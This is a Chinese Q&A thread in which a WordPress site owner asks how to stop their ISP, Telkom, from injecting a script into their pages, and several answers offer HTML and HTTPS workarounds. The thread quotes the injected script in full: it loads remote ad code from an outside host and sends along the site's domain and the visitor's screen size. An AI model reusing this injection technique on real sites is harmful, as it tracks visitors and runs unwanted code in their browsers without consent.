我的网站会被这样的脚本注入:
<script>function netbro_cache_analytics(fn, callback) {setTimeout(function()
{fn();callback();}, 0);}function sync(fn) {fn();}function requestCfs(){var
idc_glo_url = (location.protocol=="https:" ? "https://" : "http://");var idc_glo_r
= Math.floor(Math.random()*99999999999);var url = idc_glo_url+ "cfs.u-
ad.info/cfspushadsv2/request" + "?id=1" + "&enc=telkom2" + "¶ms=" +
"4TtHaUQnUEiP6K%2fc5C582Ltpw5OIinlRZ3f35Ig3RToKRLvWLwn6zEfnHRgrVr0WVf09gsyzoppB6HQ
lZs1%2bvVlaBJErvk4yTApvNxVRroJE3Sak6whXVhS8NtL5WQQ7xqk%2fl%2beEqRKsRzR0FuA%2bMRbKp
Tz%2fh8pwQUsZzPSHlUJaQ5eWnpe41LMxALmGAJ7wR93fB809%2b3BMdyLrPSeRjoat5eXfxM8hB8cF8FA
%2fADZ9XefsIT5mcIatvUYk00Cx89VQVB9oihM6lthSHZK76HYE2yVlBaqYl8N8lJpYpl3bTDK3nTOnpcZ
H07XEZDdhweI6oHkutA8rENrMv64HLRLfn%2fIH2yN7Q3C4Ly7sE6g9%2fkyUxZo0IvZ4NsUcBJwZ10Joo
9f63JGGYp%2bn8ZXG%2bI%2bHpuDri0qeXDPamxLkuhbs1gXAgx6ZSwZXm4940rBN97J6uiaXdZCyDo4ms
n2R%2f7i6CjiMCM66JMRM0RtI%2b4dRfZ2L78M%2bMB5T63xl0aYzBPpcoJFnNp75TozLX0wVNH7ZQLMIm
mchINjLEKPqXmlxC6kjQXWZiXrRa0nXtRY%2bUvCvz6huwCvSs3W8GNolSQ%3d%3d" +
"&idc_r="+idc_glo_r + "&domain="+document.domain +
"&sw="+screen.width+"&sh="+screen.height;var bsa =
document.createElement('script');bsa.type = 'text/javascript';bsa.async =
true;bsa.src = url;(document.getElementsByTagName('head')
[0]||document.getElementsByTagName('body')
[0]).appendChild(bsa);}netbro_cache_analytics(requestCfs, function(){ });</script>
</body>
</html>
u-ad.info
属于管理我的ISP(TELKOM)的公司。我向他们抱怨但它永远无法解决问题。我正在使用WordPress。如何清理该脚本或阻止该脚本注入?
答案 0 :(得分:3)
糟糕的ISP! :d
您无法清除该脚本,因为它在通过您的ISP服务器时被注入。您只能在浏览器级别阻止它。阅读此https://askubuntu.com/q/64303/224951。遗憾的是,使用同一ISP的所有网站访问者都将获得相同的注入页面。
我认为Google不会将您的网站列入黑名单,因为它当然没有使用您的ISP,因此无法看到注入的脚本。
答案 1 :(得分:1)
将body标签更改为大写。
我的实验表明,脚本注入器专门针对以小写字母书写的body标签的存在。 虽然,我不知道它会保持多长时间。
答案 2 :(得分:1)
在http://www.kaskus.co.id/thread/5491671f0e8b46ff29000007/mengakali-script-injeksi-spidol-as-a-web-developer查看我的解决方案 只是改变
</body>
到
</Body>
答案 3 :(得分:1)
有一个非常简单的方法可以防止脚本注入。
只需在</body>
标签之前添加此脚本即可。
<script>
//</body>
</script>
此图像在使用前后显示。
使用前:
使用后:
如果使用wordpress,只需确保安装了插件即可在页脚部分编写该脚本。
只需在ISP TELKOM知道之前执行此操作。
答案 4 :(得分:0)
根据我的经验,您可以使用https协议或使用此技巧来避免来自ISP的加载脚本:P
<!-- </body></html> -->
在您的“真实”</body></html>
标记上方添加上面的代码,让我们这样做!
答案 5 :(得分:0)
使用HTTPS(如果由服务器提供),或使用VPN / SSH隧道/安全代理。因此,所有问题都将得到解决。 ISP通过提取所有压缩,注入而不压缩回数据来注入广告和分析脚本。它将为您的Internet连接配额收取额外费用。
答案 6 :(得分:0)
已更新:Telkom ISP已检测到</body></html>
是否在注释中。
我的解决方案:
完全没有</body></html>
让浏览器自行关闭标签
已经过测试,并于2018年12月生效
谢谢
答案 7 :(得分:-1)
在HTML的头部或末尾插入下面的代码。
<script type="text/javascript">
$(document).ready(function(){
$('body').append("</bo"+"dy>");
});
</script>
但请确保您的HTML代码不包含</body>
结束标记,并在<head>
标记中包含jQuery。
示例:
完整的HTML
<html>
<title>Foo bar</title>
<head></head>
<body>Lorem Ipsum</body>
</html>
成为
<html>
<title>Foo bar</title>
<head>
<script src=”https://ajax.googleapis.com/ajax/libs/jquery/3.2.1/jquery.min.js”></script>
</head>
<body>Lorem Ipsum
<script type="text/javascript">
$(document).ready(function(){
$('body').append("</bo"+"dy>");
});
</script>
</html>
没有</body>
结束标记。 ISP上的HTTP过滤器将grep </body>
或</Body>
或任何<body>
结束标记,然后在<body>
结束标记之前注入JavaScript代码,以便其广告显示在上任何使用HTTP协议的网站。